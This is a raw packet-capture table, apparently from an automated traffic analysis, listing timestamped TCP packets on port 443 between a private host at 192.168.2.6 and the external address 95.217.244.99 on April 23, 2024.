Apr 23, 2024 21:44:15.328059912 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.328082085 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.328098059 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.328129053 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.328147888 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.373569965 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.373636007 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.373697996 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.373732090 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.373778105 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.373778105 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.415714025 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.415760994 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.415802956 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.415819883 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.415848017 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.415868998 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.461015940 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.461062908 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.461114883 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.461138964 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.461174965 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.461193085 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.507008076 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.507033110 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.507081032 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.507097960 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.507148027 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.543801069 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.543826103 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.544029951 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.544058084 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.544188976 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.570171118 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.570192099 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.570302010 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.570302010 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.570312023 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.570437908 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.596326113 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.596370935 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.596415997 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.596436024 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.596463919 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.596491098 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.618227959 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.618273973 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.618308067 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.618316889 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.618387938 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.618387938 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.639957905 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.639980078 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.640077114 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.640077114 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.640084982 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.640671015 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.662164927 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.662230968 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.662266970 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.662275076 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.662324905 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.662324905 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.681495905 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.681552887 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.681720018 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.681727886 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.681751013 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.681824923 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.699168921 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.699237108 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.699363947 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.699363947 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.699383020 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.699456930 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.716320038 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.716375113 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.716480017 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.716480017 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.716499090 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.717264891 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.734548092 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.734566927 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.734735966 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.734749079 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.734993935 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.748806000 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.748862982 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.748912096 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.748919964 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.748965025 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.748994112 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.766022921 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.766072989 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.766160965 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.766160965 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.766169071 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.766273975 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.780194044 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.780261993 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.780414104 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.780421019 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.780575991 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.780632973 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.796314955 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.796354055 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.796466112 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.796466112 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.796477079 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.796545982 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.810431957 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.810473919 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.810550928 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.810550928 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.810560942 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.810714006 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.823141098 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.823163986 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.823273897 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.823287964 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.823389053 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.837402105 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.837419987 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.837574005 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.837590933 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.838233948 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.843197107 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.843266010 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.843350887 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.843350887 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.843713045 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.843713045 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.843734026 CEST	443	49721	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.844855070 CEST	49721	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.925889015 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.925940037 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:15.926245928 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.926474094 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:15.926489115 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:16.361319065 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:16.361517906 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:16.362514019 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:16.362524033 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:16.362801075 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:16.362806082 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.052526951 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.052555084 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.052572012 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.052762032 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.052788973 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.052860022 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.150820971 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.150846958 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.151001930 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.151030064 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.151078939 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.291349888 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.291378021 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.291461945 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.291490078 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.291536093 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.393515110 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.393549919 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.393731117 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.393769979 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.393789053 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.394689083 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.467094898 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.467130899 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.467451096 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.467500925 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.467555046 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.514722109 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.514750004 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.514925003 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.514961958 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.515011072 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.557604074 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.557627916 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.557770014 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.557804108 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.557877064 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.597093105 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.597110987 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.597206116 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.597243071 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.597291946 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.639942884 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.639978886 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.640029907 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.640065908 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.640095949 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.640119076 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.682760954 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.682785034 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.682847977 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.682868958 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.682920933 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.717099905 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.717125893 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.717200994 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.717231035 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.717272043 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.741864920 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.741897106 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.741956949 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.741981983 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.742034912 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.742058039 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.765769958 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.765791893 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.765919924 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.765948057 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.765994072 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.786380053 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.786407948 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.786529064 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.786562920 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.786607981 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.808165073 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.808202028 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.808243036 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.808267117 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.808301926 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.808336020 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.827743053 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.827764034 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.827814102 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.827838898 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.827857971 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.827886105 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.845829010 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.845854044 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.845940113 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.845958948 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.845999956 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.861937046 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.861962080 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.862049103 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.862071037 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.862113953 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.879857063 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.879877090 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.879946947 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.879971027 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.880023956 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.898736954 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.898761988 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.898858070 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.898874998 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.898917913 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.912041903 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.912075043 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.912172079 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.912189007 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.912236929 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.927093983 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.927140951 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.927191019 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.927206993 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.927236080 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.927261114 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.940325975 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.940373898 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.940433025 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.940454006 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.940614939 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.940614939 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.955809116 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.955878019 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.955925941 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.955943108 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.956077099 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.956077099 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.967885017 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.967940092 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.967993021 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.968008995 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.968149900 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.968149900 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.980707884 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.980736017 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.980859041 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.980875015 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.981019020 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.994936943 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.994967937 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.995100021 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:17.995112896 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:17.995157957 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.005760908 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.005778074 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.005871058 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.005883932 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.005928040 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.016253948 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.016271114 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.016468048 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.016474962 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.016515970 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.027187109 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.027210951 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.027292967 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.027301073 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.027460098 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.038463116 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.038484097 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.038563967 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.038578033 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.038618088 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.047657013 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.047678947 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.047787905 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.047799110 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.047842979 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.058085918 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.058105946 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.058211088 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.058227062 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.058438063 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.065970898 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.066014051 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.066060066 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.066090107 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.066106081 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.066134930 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.075792074 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.075839996 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.075890064 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.075896025 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.076090097 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.083781004 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.083826065 CEST	443	49723	95.217.244.99	192.168.2.6
